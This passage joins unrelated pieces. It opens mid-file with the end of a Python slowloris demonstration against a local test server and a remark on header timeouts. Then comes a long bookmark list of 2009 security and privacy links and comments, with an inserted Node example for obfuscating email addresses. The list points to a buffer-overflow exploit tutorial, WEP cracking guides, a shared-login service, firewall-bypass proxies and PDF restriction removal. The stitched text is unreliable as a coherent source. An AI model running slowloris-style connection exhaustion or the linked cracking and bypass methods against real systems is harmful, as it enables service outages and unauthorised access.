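        chunk = s.recv(4096)
        if not chunk:
            break
        data += chunk
    s.close()
    return data.startswith(b"HTTP/1.1 200")


def run_demo():
    """Returns (header lines the slow client got in, whether a normal client was served)."""
    srv, port = start_server()
    try:
        slow = slowloris_client(port)
        ok = normal_client(port)
    finally:
        srv.close()
    return slow, ok
```

Raise `HEADER_DEADLINE` above the client's total trickle time and `run_demo()` reports the slow client getting all of its lines in: that is the state a server without a request-header timeout sits in, once per attacker connection, until its worker pool is gone.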
http://www.foreignpolicy.com/story/cms.php?story_id=4862&print=1
Robert Kaplan reviews and posits theories of geographical determinism in international relations. Some cool theories here. "The wisdom of geographical determinism endures across the chasm of a century because it recognizes that the most profound struggles of humanity are not about ideas but about control over territory, specifically the heartland and rimlands of Eurasia. Of course, ideas matter, and they span geography. And yet there is a certain geographic logic to where certain ideas take hold. Communist Eastern Europe, Mongolia, China, and North Korea were all contiguous to the great land power of the Soviet Union. Classic fascism was a predominantly European affair. And liberalism nurtured its deepest roots in the United States and Great Britain, essentially island nations and sea powers both. Such determinism is easy to hate but hard to dismiss. "
oh, I must find and read that MacKinder article. What a hypothesis! fabulously heady stuff.
Robert Kaplan on the return of geography.
We all must learn to think like Victorians. That is what must guide and inform our newly rediscovered realism. Geographical determinists must be seated at the same honored table as liberal humanists, thereby merging the analogies of Vietnam and Munich. Embracing the dictates and limitations of geography will be especially hard for Americans, who like to think that no constraint, natural or otherwise, applies to them. But denying the facts of geography only invites disasters that, in turn, make us victims of geography. Better, instead, to look hard at the map for ingenious ways to stretch the limits it imposes, which will make any support for liberal principles in the world far more effective. Amid the revenge of geography, that is the essence of realism and the crux of wise policymaking—working near the edge of what is possible, without slipping into the precipice.
How Geography Determines Human Conflict in the World
People and ideas influence events, but geography largely determines them, now more than ever. To understand the coming struggles, it’s time to dust off the Victorian thinkers who knew the physical world best. A journalist who has covered the ends of the Earth offers a guide to the relief map—and a primer on the next phase of conflict. By Robert D. Kaplan
The Big Ol' Ubuntu Security Resource | IT Security | http://www.focus.com
http://www.focus.com/articles/it-security/big-ol-ubuntu-security-resource/
IT Security has prepared a guide to help you close your system's backdoors and protect you from some of the common Ubuntu exploits.
sudo chown root:admin /bin/su sudo
Not everything is useful on this list
Securing Ubuntu right out of the box. Note: there is some conjecture about whether these are necessary. See feedback in article comments.
Ubuntu is billed as ultra-secure, but its default install has flaws -- here's how to modify your install for the ultimat
Iran's Web Spying Aided By Western Technology - WSJ.com
http://online.wsj.com/article/SB124562668777335653.html
"Every digitized packet of online data is deconstructed, examined for keywords and reconstructed within milliseconds."
more on Deep packet
Deep packet inspection
How it's done.
The Iranian regime has developed, with the assistance of European telecommunications companies, one of the world's most sophisticated mechanisms for controlling and censoring the Internet, allowing it to examine the content of individual online communications on a massive scale.
The Iranian authorities have substantial Internet surveillance capabilities (Siemens + Nokia technology), which explains why they have not "cut off" the network...
Writing buffer overflow exploits - a tutorial for beginners
http://mixter.void.ru/exploit.html
Stop Password Masking (Jakob Nielsen's Alertbox)
http://www.useit.com/alertbox/passwords.html
Advice about how masking password entries can reduce usability and increase user error and frustration.
Jakob comes out against password masking
More importantly, there's usually nobody looking over your shoulder when you log in to a website. It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.
Got to agree with Jakob here. Seeing *****'s as you type your password just leads to mistyped passwords
Can I get an Amen?
I question the overall security of an app if the input isn't masked. Logically, he makes sense, but users aren't asking for it. Leave it be.
Creating an Advanced Password Recovery Utility - Nettuts+
http://net.tutsplus.com/tutorials/php/creating-an-advanced-password-recovery-utility/
» The minimum you should do to build a secure server: S-cubism Labs Blog
http://labs.s-cubism.com/blog/2009/06/19/120/
TwitChuck - Seriously taking on Twitter spam
http://www.twitchuck.com/index.php
To see who is following you.
Tells you whether the people you followed are spammers.
CrypTool - Educational Tool for Cryptography and Cryptanalysis
http://cryptool.com/
Lifehacker - How to Crack a Wi-Fi Network's WEP Password with BackTrack - wep
http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack
You already know that if you want to lock down your Wi-Fi network, you should opt for WPA encryption because WEP is easy to crack. But did you know how easy? Take a look.
Settings to make first after installing Firefox 3.5 : audiofan.net blog
http://blog.audiofan.net/archives/759495.html
"For sites whose cookies you want to keep even after the window is closed, just allow them under 'Exceptions'."
ComboFix | freeware
http://www.combofix.org/
Free spyware and malware removal tool.
Tales from the encrypt: the secrets of data protection | Technology | guardian.co.uk
http://www.guardian.co.uk/technology/2009/jun/30/data-protection-internet
Tales from the encrypt: If you care about the integrity of your data, it's time to investigate solutions for accessing and securing it – and not just for the here and now
"But what if I were killed or incapacitated before I managed to hand the passphrase over to an executor or solicitor who could use them to unlock all this stuff that will be critical to winding down my affairs – or keeping them going, in the event that I'm incapacitated? I don't want to simply hand the passphrase over to my wife, or my lawyer. Partly that's because the secrecy of a passphrase known only to one person and never written down is vastly superior to the secrecy of a passphrase that has been written down and stored in more than one place. Further, many countries' laws make it difficult or impossible for a court to order you to turn over your keys; once the passphrase is known by a third party, its security from legal attack is greatly undermined, as the law generally protects your knowledge of someone else's keys to a lesser extent than it protects your own."
10 things you should do to a new Linux PC before exposing it to the Internet - Program - Linux - Builder AU
http://www.builderau.com.au/program/linux/soa/10-things-you-should-do-to-a-new-Linux-PC-before-exposing-it-to-the-Internet/0,339028299,339274586,00.htm
When you are embarking on the Linux experience for the first time, there are a few things you should know.
Linux Maintenance
10 things you should do to a new Linux PC before exposing it to the Internet
How To Build a Theft-Proof iPhone : iSmashPhone
http://www.ismashphone.com/2009/05/how-to-build-a-theftproof-iphone.html
for less than the $99 per year that Apple's mobileme service costs
PHP Security: Fortifying Your Website- Power Tips, Tools & How to’s | Noupe
http://www.noupe.com/php/php-security-tips.html
How To Communicate Securely in Repressive Environments « iRevolution
http://irevolution.wordpress.com/2009/06/15/digital-security/
After Iran. How to use the Internet to communicate.
Two Centuries On, a Cryptologist Cracks a Presidential Code - WSJ.com
http://online.wsj.com/article/SB124648494429082661.html
For more than 200 years, buried deep within Thomas Jefferson's correspondence and papers, there lay a mysterious cipher -- a coded message that appears to have remained unsolved. Until now. The cryptic message was sent to President Jefferson in December 1801 by his friend and frequent correspondent, Robert Patterson, a mathematics professor at the University of Pennsylvania. President Jefferson and Mr. Patterson were both officials at the American Philosophical Society -- a group that promoted scholarly research in the sciences and humanities -- and were enthusiasts of ciphers and other codes, regularly exchanging letters about them.
Sweet
Lifehacker - WEP Cracking Redux: Beyond the Command Line - Security
http://lifehacker.com/5309695/wep-cracking-redux-beyond-the-command-line
iPhone-like password fields using jQuery // DECAF° blog für digitale kommunikation
http://blog.decaf.de/2009/07/iphone-like-password-fields-using-jquery/
Non-JS users get the common masked password fields.
Nice jQuery plugin to partially mask password fields.
Ksplice - Ksplice Uptrack
http://www.ksplice.com/uptrack/
Ksplice Uptrack is a new service that lets you effortlessly keep your systems up to date and secure, without rebooting. Once you’ve completed the easy installation process, your system will be set up to receive rebootless updates instead of traditional, disruptive updates.
This software lets you update your linux system without the need for a reboot. Looks pretty promising, available for ubuntu now.
12 Essential Security Tips and Hacks for WordPress
http://sixrevisions.com/wordpress/12-essential-security-tips-and-hacks-for-wordpress/
Five Best Content Filtering Tools - content filtering - Lifehacker
http://lifehacker.com/5312820/five-best-content-filtering-tools
Whether you want to keep your kids' eyes away from inappropriate content or your employees from wasting time online, you'll find a variety of great tools available for filtering internet access in today's Hive Five.
Last week we asked you to share your favorite method of filtering internet content. While we originally intended to approach the topic from a software angle, it quickly became apparent that software didn't cut it for most people and that the majority of you are using either a combination of desktop software and a proxy server/firewall or just the latter by itself. The following solutions range, in difficulty of installation, from as simple as requiring five minutes to install to as complex as setting up a physical computer as a Linux-based content filter.
DansGuardian (Cross Platform, Free)
One way to measure whether or not Dansguardian is the right filtering tool for you is your willingness to install and tinker with an opera
hid.im
http://www.hid.im/
A Hidim turns a torrent into a regular PNG image
Torrent into PNG
Are you one of those people who has always wanted to hide a torrent inside an image? Wait no longer, with Hid.im it takes just one click to convert a torrent into an image file, with the option to decode it later on.
BackupMyTweets: Backup Your Twitter Account
http://backupmytweets.com/
FT.com / Magazine - First Person: Frank Ahearn
http://www.ft.com/cms/s/2/babf36d2-548e-11de-a58d-00144feabdc0.html
Short, interesting profile -- reminded me of Neil Strauss' 'Emergency' (http://www.amazon.com/Emergency-This-Book-Will-Save/dp/0060898771/ref=sr_1_1?ie=UTF8&s=books&qid=1248037945&sr=8-1) and a lengthier New Yorker profile on 'chameleon' Frederic Bourdin - http://www.newyorker.com/reporting/2008/08/11/080811fa_fact_grann
Former private investigator helps people "disappear" and move to new lives.
There are three key steps to disappearing. First, destroy old information about yourself. Call your video store or electricity company and replace your old, correct phone number with a new, invented one. Introduce spelling mistakes into your utility bills. Create a PO Box for your mail. Don’t use your credit cards and the like. Then, create bogus information to fool private investigators who might be looking for you. Go to one city and apply for an apartment. Rent a car in another one. The next, final step is the most important one. Move from point A to point B. Create a dummy company to pay your bills. Only use prepaid mobile phones and change them every month. It is nearly impossible to find out where you are unless you make a mistake.
''help people disappear''
An ex PI now helps people disappear.
The Anatomy Of The Twitter Attack
http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/
Stop Image Hotlinking with .htaccess
http://www.thewebsqueeze.com/web-design-tutorials/stop-image-hotlinking-with-htaccess.html
The Power of HTML 5 and CSS 3 • Perishable Press
http://perishablepress.com/press/2009/07/19/power-of-html5-css3/
HTML 5 and CSS 3 are quickly gaining popularity, revealing their collective power with some exciting new design possibilities.
Web designers can do some pretty cool stuff with HTML 4 and CSS 2.1. We can structure our documents logically and create information-rich sites without relying on archaic, table-based layouts. We can style our web pages with beauty and detail without resorting to inline <font> and <br> tags. Indeed, our current design methods have taken us far beyond the hellish era of browser wars, proprietary protocols, and those hideous flashing, scrolling, and blinking web pages.
Want to keep your wallet? Carry a baby picture - Times Online
http://www.timesonline.co.uk/tol/news/uk/science/article6681923.ece
Times Online
OpenNMS
http://www.opennms.org/wiki/Main_Page
hi
Vanish: Enhancing the Privacy of the Web with Self-Destructing Data
http://vanish.cs.washington.edu/
Program that makes email self destruct
ehind Vanish in detail. Briefly, as mentioned above, the user never knows the encryption key. This means that there is no risk of the user exposing that key at some point in the future, perhaps through coercion, court order, or compromise. So what do we do with the key? We could escrow it with a third party, but that raises serious trust issues (e.g., the case with Hushmail).
copies of Vanish encrypted data — even archived or cached copies — will become permanently unreadable at a specific time, without any action on the part of the user or any third party or centralized service.
Storing the decryption key across many p2p nodes means you can "lose" the key at a specified time. As long as one of the p2p nodes you have used destroys the key, we can no longer decrypt the message. The theory is certainly sound, lets hope the implementation is.
Vanish is a research system designed to give users control over the lifetime of personal data stored on the web or in the cloud. Specifically, all copies of Vanish encrypted data — even archived or cached copies — will become permanently unreadable at a specific time, without any action on the part of the user or any third party or centralized service.
Top 20 OpenSSH Server Best Security Practices
http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-practices.html
AllowUsers root vivek jerry
Chroma-Hash Demo
http://mattt.github.com/Chroma-Hash/
a sexy, non-reversible live visualization of password field input
Creates a color-bar visualization of the password field useful to avoid mistakes and non-reversible.
a non-reversible live visualization of password field input
InfoQ: The First Few Milliseconds of an HTTPS Connection
http://www.infoq.com/articles/HTTPS-Connection-Jeff-Moser
Home
http://www.itshidden.com/
service using VPN to provide privacy - should be frequently used with bittorrent torrent file-sharing etc ItsHidden.com is the ultimate FREE surfing privacy service on the Internet with huge capacity and no complicated software to install, you already have everything you need on your computer right now!
HighlightCam :: Make your video shorter, automatically -- for webcams, monitoring and security
http://highlightcam.com/
Make your video shorter, automatically -- for webcams, monitoring and security
In the Woods - Working with Sessions and Cookies in PHP and MYSQL
http://blog.themeforest.net/tutorials/working-with-sessions-and-cookies-in-php-and-mysql/
Send Email Message
http://send-email.org/
send email anonymously. or send an email from anywhere privacy is a concern and you can't login to your own account. cool idea.
* Anonymous email sender.
* Send as many emails as you like.
* Free, no registration needed.
* Similar websites: DeadFake.
Very NEAT
Send Anonymous Email
Twitter, Facebook attack targeted one user | InSecurity Complex - CNET News
http://news.cnet.com/8301-27080_3-10305200-245.html
Scary news story on SN outage all being about targetting one user
Why were Twitter and Facebook down for much of August 7, 2009? It looks like it was a denial of service attack... aimed at just a single person. Probably not a good strategy - taking out the network to silence an individual - because it mobilizes so many resources to fix the problem (people wouldn't care so much if just a single account was hacked). But still interesting.
InSecurity Complex - CNET News
The Ultimate Lock Picker Hacks Pentagon, Beats Corporate Security for Fun and Profit
http://www.wired.com/techbiz/people/magazine/17-06/ff_keymaster
article on lockpicker Marc Weber Tobias
Wired.com: The Ultimate Lock Picker Hacks Pentagon, Beats Corporate Security for Fun and Profit - http://bit.ly/fSW4Q (via @BlackHatEvents) [from http://twitter.com/jkordish/statuses/1997565339]
Pretty discouraging article about the efficacy of locks beyond keeping honest people honest.
jCryption - JavaScript data encryption
http://www.jcryption.org/
In short words jCryption is a javascript HTML-Form encryption plugin, which encrypts the POST/GET-Data that will be sent when you submit a form. It uses the Multiple-precision and Barrett modular reduction libraries for the calculations and jQuery for the rest. jCryption is completly free and dual licensed under the MIT and GPL licenses like jQuery.
The Definitive Guide to htaccess Techniques: Do’s and Don’ts | Noupe
http://www.noupe.com/php/htaccess-techniques.html
Of all the elements of web design and coding, htaccess can be one of the most intimidating. After all, it's an incredibly powerful tool and one that has the
Google Privacy Blunder Shares Your Docs Without Permission
http://www.techcrunch.com/2009/03/07/huge-google-privacy-blunder-shares-your-docs-without-permission/
In a privacy error that underscores some of the biggest problems surrounding cloud-based services, Google has sent a notice to a number of users of its Document and Spreadsheets products stating that it may have inadvertently shared some of their documents with contacts who were never granted access to them.
Google products are NOT FREE. The Worlds’ Biggest Data Hoover makes you pay with your privacy. Enjoy the ride in the “cloud”.
Paul - March 7th, 2009 at 1:31 am PST: I agree with this balanced opinion.
Smart Babes Are Sexy Blog - March 7th, 2009 at 7:49 am PST: Free or not, some things are just not acceptable. Yes, air is “free”, but that does not allow people to pollute it without abandon. Facebook is “free”, but that does not allow it to take away all ownership rights of all the content I would post there. As one comic book character once said, “With great power comes grea
Google is Evil?
You Deleted Your Cookies? Think Again | Epicenter | Wired.com
http://www.wired.com/epicenter/2009/08/you-deleted-your-cookies-think-again/
More than half of the internet’s top websites use a little known capability of Adobe’s Flash plugin to track users and store information about them, but only four of them mention the so-called Flash Cookies in their privacy policies, UC Berkeley researchers reported Monday.
internet privacy
Facebook’s New Privacy Features: A Complete Guide
http://mashable.com/2009/08/12/facebook-privacy-features/
IP Hide Tools and Services - AllAnonymity.com » IP Hider - Hide IP Software
http://www.allanonymity.com/ip-hider-hide-ip-software/
IP Hider masks a user's real IP, letting them browse all kinds of pages without worrying that ISPs or marketing tools are monitoring their surfing habits or that spammers are attacking their computer. The simplest way to do this is to have traffic redirected through anonymous proxies.
IP Hide
Facebook privacy: a guide - Ars Technica
http://arstechnica.com/web/news/2009/08/meshing-social-networking-and-privacy-on-facebook.ars
Ars Technica's Facebook privacy guide.
Carsonified » Five Things That Will Kill Your Site
http://carsonified.com/blog/web-apps/five-things-that-will-kill-your-site/
ThinkVitamin - Carsonified's blog about the web
WEB DESIGN
death
SocialSafe | Your Facebook photos, photos you are tagged in, profile and friends saved to your machine or device
http://www.socialsafe.net/
Your Facebook photos, profile and friends saved to your machine or device - now with Time Capsule!
SocialSafe - Save. Store. Explore. The backup tool for Facebook
http://hackerschool.org/DefconCTF/17/B300.html
Educational hacking comic from Korea that writes up how to solve a DEFCON challenge.
11 Vital Tips and Hacks to Protect Your WordPress Admin Area
http://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/
n set your login url to something more cryptic. This won’t secure your website
As we continued to emphasize the security of your WordPress admin panel due to the recent attack on our site, we have compiled a fully detailed article that will highlight some of the must have security measures for your WordPress Admin Area.
Hiromitsu Takagi's diary from home - Japanese web developers really have regressed: the case of "Nico Nico Douga × iPhone OS"
http://takagi-hiromitsu.jp/diary/20090802.html#p01
Twitter
http://twitter.com/help/verified
>What is a verified account? To avoid confusion over whether an account belongs to the person it claims to, Twitter is starting an experiment (beta test) with "Verified Accounts". We are working to establish authenticity for people who regularly suffer from impersonation or confusion over their identity. Accounts carrying the Verified mark are the real thing! What does it mean? With this feature you can easily tell which of the profiles we know are "real" and trustworthy. It means we have been in contact with the person or entity and confirmed that the profile is approved, in other words verified. (It does not verify who is actually writing the tweets.) Nor does it mean that a profile without the "Verified Account" mark is fake. The vast majority of accounts on Twitter are not impersonations, and we cannot check for impersonation 100%. For now we are verifying only some profiles, in order to deal with cases of mistaken identity or impersonation. If you are unsure whether an account that has not yet been verified is genuine, you can look at that person's official website and check whether it links to their Twitter profile. (Again, the absence of a link does not mean it is an impersonation.) Whose accounts will show the "Verified Account" mark? We are starting with the profiles of well-known people who have problems with impersonation or identity confusion (for example well-known artists, athletes, actors, government officials and public agencies). We plan to verify many more profiles in future, but because of cost and time we are starting with only a few accounts. As the test progresses over the coming months we should be able to extend it to many more profiles. I have problems with impersonation. Can I get my account verified? We cannot verify every profile, but if your account routinely has problems such as impersonation, we will help you resolve them. …
With this feature, you can easily see which accounts we know are 'real' and authentic. That means we've been in contact with the person or entity the account is representing and verified that it is approved. (This does not mean we have verified who, exactly, is writing the tweets.)
"To prevent identity confusion, Twitter is experimenting (beta testing) with a 'Verified Account' feature. We're working to establish authenticity with people who deal with impersonation or identity confusion on a regular basis. Accounts with a [check mark indicating they are] Verified are the real thing!"
To prevent identity confusion. Test-Version.
To prevent identity confusion, Twitter is experimenting (beta testing) with a 'Verified Account' feature. We're working to establish authenticity with people who deal with impersonation or identity confusion on a regular basis.
danielmiessler.com | study | A Tcpdump Tutorial / Primer
http://danielmiessler.com/study/tcpdump/
Tcpdump is the premier network analysis tool for information security professionals. Having a solid grasp of this über-powerful application is mandatory for anyone desiring a thorough understanding of TCP/IP. Many prefer to use higher level analysis tools such as Wireshark, but I believe this to usually be a mistake. In a discipline so dependent on a true understanding of concepts vs. rote learning, it's important to stay fluent in the underlying mechanics of the TCP/IP suite. A thorough grasp of these protocols allows one to troubleshoot at a level far beyond the average analyst, but mastery of the protocols is only possible through continued exposure to them. ... for this reason I strongly advocate using tcpdump instead of other tools whenever possible.
The Best Place To Hide Money: Conversation With A Burglar - SavingAdvice.com Blog
http://www.savingadvice.com/blog/2007/02/05/101141_the-best-place-to-hide-money-conversation-with-a-burglar.html
"If I can't find money and valuables in the normal places I usually find them, I would continue to tear the house apart until I found something," which is why the post advises that, in addition to your hiding spots, it's best to leave some money out in obvious places if, say, you're heading on a vacation and are concerned about would-be thieves. This can not only save your other stash of money, but may actually keep the burglar from destroying your place as he looks for where you have hidden your money. If they believe they may have found the cash that you have in the house, they are much less likely to keep looking (remember, they want to get out asap). In the end, if you hide all your money well, you may win a moral victory in not letting the burglar find the money, but you'll likely have much more damage done to your place that will end up costing you more in the long run.
Carsonified » How to Create Totally Secure Cookies
http://carsonified.com/blog/dev/how-to-create-totally-secure-cookies/
How to Create Totally Secure Cookies
Securing cookies and sessions is vital to keeping an application secure. Many tutorials have been written on the subject, but as the internet (and browsers loading it) evolve so do the methods you can use to keep your application secure. In this article we’re going to break down the various components of a cookie and what they mean for security. This will include limiting the cookie to certain domains and paths on those domains, choosing what information to store, and protecting the cookie from cross site scripting exploits. In a second article we will go into more depth in how to protect everyone’s favorite cookie, the session ID.
pdfpirate.net - free, online and no limits pdf restriction remover
http://pdfpirate.net/
Removes restrictions on PDFs through an upload.
Free login to any site
http://login2.me/
Connect to any site that requires a user name and password
This service is made to save you time on registration for many sites. You cannot register at every site, so just type the name of the site for which you need a login and password and click «Get».
Probably the best free security list in the world
http://www.techsupportalert.com/content/probably-best-free-security-list-world.htm
free security software/services
Recommended by Gizmo
anti virus and more
virus spyware antivirus security
Lifehacker - FreeProxy Helps You Circumvent Restrictive Firewalls - Proxy
http://lifehacker.com/5226972/freeproxy-helps-you-circumvent-restrictive-firewalls
Recommended by Lifehacker
Windows only: Corporate firewall got you down? No Facebook behind your school's filter? FreeProxy is a simple proxy tool for routing your browsing through your home computer.
Amazon Web Services Blog: Introducing Amazon Virtual Private Cloud (VPC)
http://aws.typepad.com/aws/2009/08/introducing-amazon-virtual-private-cloud-vpc.html
Amazon Virtual Private Cloud (Amazon VPC) lets you create your own logically isolated set of Amazon EC2 instances and connect it to your existing network using an IPsec VPN connection. This new offering lets you take advantage of the low cost and flexibility of AWS while leveraging the investment you have already made in your IT infrastructure.
@igrigorik: "cool, amazon launches "virtual private cloud" service @ http://bit.ly/w2z6d" (from http://twitter.com/igrigorik/status/3556113445)
MailTo Encoder | Prevent Spam by encoding your email address
http://www.mailtoencoder.com/
Prevent spambots from getting your email, encode all the email addresses you publish on your site! Enter the address you want to encode, then put the code we provide in the source code where the address should appear and...VOILA!
Keeps your email address away from spam crawlers
If you’ve encountered a situation where you leave your email address on a public website and start getting spam starting next day, then you are not alone. Mailto Encoder is a site which helps to prevent this by encoding your email address with javascript in a way that makes it unreadable to any spam bot spider or email extractor.
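Added example, written for Node and not mailtoencoder.com's own code: two layers of address obfuscation for a page's HTML source, with a simulated harvester to show what each layer hides. The scheme (numeric HTML entities for the visible text, a reversed and base64-encoded token that script turns back into the mailto: link on click) is my own choice; the site's actual encoding is not shown on this page. Buffer stands in for the browser's btoa/atob so the example runs offline.

```javascript
// Added example, not the site's code: obfuscate an address in the HTML source
// and rebuild the mailto: link at runtime. The encoding scheme is my own.

// Layer 1: every character as a decimal entity. The browser renders it as
// plain text, but a scraper matching /[\w.]+@[\w.]+/ on the raw source
// finds nothing.
function toEntities(str) {
  return Array.from(str, ch => `&#${ch.codePointAt(0)};`).join('');
}
function fromEntities(html) {   // what a browser (or a smarter scraper) does
  return html.replace(/&#(\d+);/g, (_, n) => String.fromCodePoint(Number(n)));
}

// Layer 2: the mailto: target. The reversed address is base64-encoded into a
// data attribute and only turned back into a link when the user clicks.
// (In a browser, replace Buffer with btoa/atob.)
function encodeAddress(addr) {
  return Buffer.from([...addr].reverse().join(''), 'utf8').toString('base64');
}
function decodeAddress(token) {
  return [...Buffer.from(token, 'base64').toString('utf8')].reverse().join('');
}

// The snippet a site owner pastes where the address should appear.
// decodeAddress must be a global function in the page for the onclick to work.
function mailtoSnippet(addr, linkText = addr) {
  const token = encodeAddress(addr);
  return `<a href="#" data-m="${token}" ` +
         `onclick="this.href='mailto:'+decodeAddress(this.dataset.m)">` +
         `${toEntities(linkText)}</a>`;
}

// Simulate a naive harvester: every address-shaped string in the raw HTML.
function harvest(html) {
  const m = html.match(/[\w.+-]+@[\w-]+(?:\.[\w-]+)+/g);
  return m || [];
}
```

The entity layer stops regex harvesters that never render the page; a crawler that decodes entities still gets the visible text, which is why the actual mailto: target only exists after the click handler runs.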
Freeware that pulls the license keys out of your installed software: 'LicenseCrawler' - IDEA*IDEA ~ the Hyakushiki admin's lifehack blog
http://www.ideaxidea.com/archives/2009/08/licensecrawler.html
Freeware that pulls the license keys out of your installed software
A tool that scans the license key information stored in the Windows registry. Handy when you can't remember what the key for some software you use was. Runs quickly, too.
Bill would give president emergency control of Internet | Politics and Law - CNET News
http://news.cnet.com/8301-13578_3-10320096-38.html
Sounds like whoever drafted the bill had just finished watching Die Hard 4.
Critics question revised proposal from Sen. Jay Rockefeller to let the White House do what it deems necessary to respond to a 'cybersecurity emergency.' Read this blog post by Declan McCullagh on Politics and Law.
The new version would allow the president to "declare a cybersecurity emergency" relating to "non-governmental" computer networks and do what's necessary to respond to the threat. Other sections of the proposal include a federal certification program for "cybersecurity professionals," and a requirement that certain computer systems and networks in the private sector be managed by people who have been awarded that license.
When Rockefeller (D-W. Virginia), the chairman of the Senate Commerce committee, and Olympia Snowe (R-Maine) introduced the original bill in April, they claimed it was vital to protect national cybersecurity. "We must protect our critical infrastructure at all costs--from our water to our electricity, to banking, traffic lights and electronic health records," Rockefeller said. The Rockefeller proposal plays out against a broader concern in Washington, D.C., about the government's role in cybersecurity. In May, President Obama acknowledged that the government is "not as prepared" as it should be to respond to disruptions and announced that a new cybersecurity coordinator position would be created inside the White House staff. Three months later, that post remains empty, one top cybersecurity aide has quit, and some wags have begun to wonder why a government that receives failing marks on cybersecurity should be trusted to instruct the private sector what to do.
Home ‎(Peer Block)‎
http://www.peerblock.com/
4 Sites That Give You A Free Updated Proxy List
http://www.makeuseof.com/tag/4-sites-that-give-you-a-free-updated-proxy-list/
Use Firefox to Fix the Web's Biggest Annoyances - Annoyances - Lifehacker
http://lifehacker.com/5349446/use-firefox-to-fix-the-webs-biggest-annoyances
ext page inline without having to reload. Each of the extensions works a little differently, and
Use Firefox to Fix the Web's Biggest Annoyances
Proxy Lists
http://www.stayinvisible.com/proxy_lists.html
Below is a list of some third-party sites where you can find free proxy server lists.
good list of proxies
Carsonified » How to Create Bulletproof Sessions
http://carsonified.com/blog/dev/how-to-create-bulletproof-sessions/
»In the first part of this series we went over how a cookie works and what can be done to secure them. In this section we’re going to go over ways to add additional security to the session beyond the cookie itself.«
I've been looking for a good way to do sessions. I only skimmed so needs further reading.
Carsonified » How to Create Bulletproof Sessions http://ow.ly/nCXn [from http://twitter.com/10minuteexpert/statuses/3694747748]
How to Recover Your Firefox Master Password - Firefox - Lifehacker
http://lifehacker.com/5350375/how-to-recover-your-firefox-master-password
If you're using Firefox's built-in password management, you should also be using its master password feature to protect your saved passwords from prying eyes. But what happens if you lose your master password?
Freeware Files.com - Download
http://www.freewarefiles.com/downloads_counter.php?programid=44343
Freeware Files.com Download Page.
find program product keys and passwords so you can re-install
What the Internet knows about you
http://whattheinternetknowsaboutyou.com/
Webアプリにおける11の脆弱性の常識と対策 (1/4) - @IT
http://www.atmarkit.co.jp/fjava/rensai4/webjousiki11/webjousiki11_1.html
Old WordPress Versions Under Attack « Lorelle on WordPress
http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
UPGRADE! Sorry, didn't mean to yell. But cleaning your corrupted install sucks a nut.
Wordpress under attack?
WordPress › Blog » How to Keep WordPress Secure
http://wordpress.org/development/2009/09/keep-wordpress-secure/
Good reminder of why it's important to keep your Wordpress blog updated and patched
RT @wordpress: How to Keep WordPress Secure: http://bit.ly/12zHUd [from http://twitter.com/Jennerosity/statuses/3785091291]
There is another serious WordPress hack making the rounds. If you run WordPress, make sure you upgrade ASAP
"Anonymized" data really isn't—and here's why not - Ars Technica
http://arstechnica.com/tech-policy/news/2009/09/your-secrets-live-online-in-databases-of-ruin.ars
birthdate
Free.korben.info - Pour un internet libre
http://free.korben.info/index.php/Accueil
wiki
Top 10 Tricks for Creatively Hiding Your Stuff - Security - Lifehacker
http://lifehacker.com/5338028/top-10-tricks-for-creatively-hiding-your-stuff
Every kid has a creative stash for secret stuff, but that useful enthusiasm doesn't have to die off just because we've traded treehouses for desks. See how you can hide money, files, workspaces, and more in today's Top 10.
** Posted using Viigo: Mobile RSS, Sports, Current Events and more **
10 Solid Tips to Safeguard Your Facebook Privacy
http://www.makeuseof.com/tag/the-complete-guide-to-facebook-privacy/
Top 10 Tactics for Protecting Your Stuff - Theft - Lifehacker
http://lifehacker.com/5357929/top-10-tactics-for-protecting-your-stuff
10 tips for protecting your belongings :-P
The Data Liberation Front (the Data Liberation Front)
http://www.dataliberation.org/home
and out of
We intend for this site to be a central location for information on how to move your data in and out of Google products. Welcome.
save
Getting Clean With PHP - Nettuts+
http://net.tutsplus.com/tutorials/php/getting-clean-with-php/
5 Easy Steps to Stay Safe (and Private!) on Facebook
http://www.readwriteweb.com/archives/5_easy_steps_to_stay_safe_and_private_on_facebook.php
People everywhere are mindlessly over-sharing on the world's largest social network, without a second thought as to who's reading their posts or what effect it could have on them further down the road.
5 Easy Steps to Stay Safe (and Private!) on Facebook
When the President of the United States warns schoolchildren to watch what they say and do on Facebook, you know that we've got a problem...and it's not one limited to the U.S.'s borders, either. People everywhere are mindlessly over-sharing on the world's largest social network, without a second thought as to who's reading their posts or what effect it could have on them further down the road. For example, did you know that 30% of today's employers are using Facebook to vet potential employees prior to hiring? In today's tough economy, the question of whether to post those embarrassing party pics could now cost you a paycheck in addition to a reputation. (Keep that in mind when tagging your friends' photos, too, won't you?) But what can be done? It's not like you can just quit Facebook, right? No - and you don't have to either. You just need to take a few precautions.
ng to enter here is "Only Friends." Anythin
bobby-tables.com: A guide to preventing SQL injection
http://bobby-tables.com/
13 Things a Burglar Won't Tell You | Security Threats | Reader's Digest
http://www.rd.com/your-america-inspiring-people-and-stories/13-things-a-burglar-wont-tell-you/article156709.html
Should you spend your money on a home security system? A look inside a burglar's mind might help you decide.
10 Ways to Use .htaccess to Speed Up WordPress | WPShout.com
http://wpshout.com/10-ways-to-use-htaccess-to-speed-up-wordpress/
Smokescreen § Homepage
http://www.smokescreengame.com/
Awesome online game
A new, serious ARG (SARG?), from the people who brought you Perplex City. This time, commissioned by Channel 4 and aimed at teens. '...its goal is to illustrate the threats, dangers and opportunities of life online'. It doesn't have any offline activity, as far as I can tell, which makes sense with this demographic, the fact that Channel 4 is involved and the subject matter. It's a little too leading in the interactivity though, and not really transmedia, so not strictly within the realms of what has come to be known as an ARG. Still, interesting to see a current, non-commercial example of a participation drama.
Game supposedly teaching how to behave "responsibly" on social networking websites (and alike).
A game about internet safety aimed at young people
Moserware: A Stick Figure Guide to the Advanced Encryption Standard (AES)
http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html
Advanced Encryption Standard (AES)
good explanation of AES Rijndael.
Basic plugins you should install in WordPress
http://anond.hatelabo.jp/20090920234008
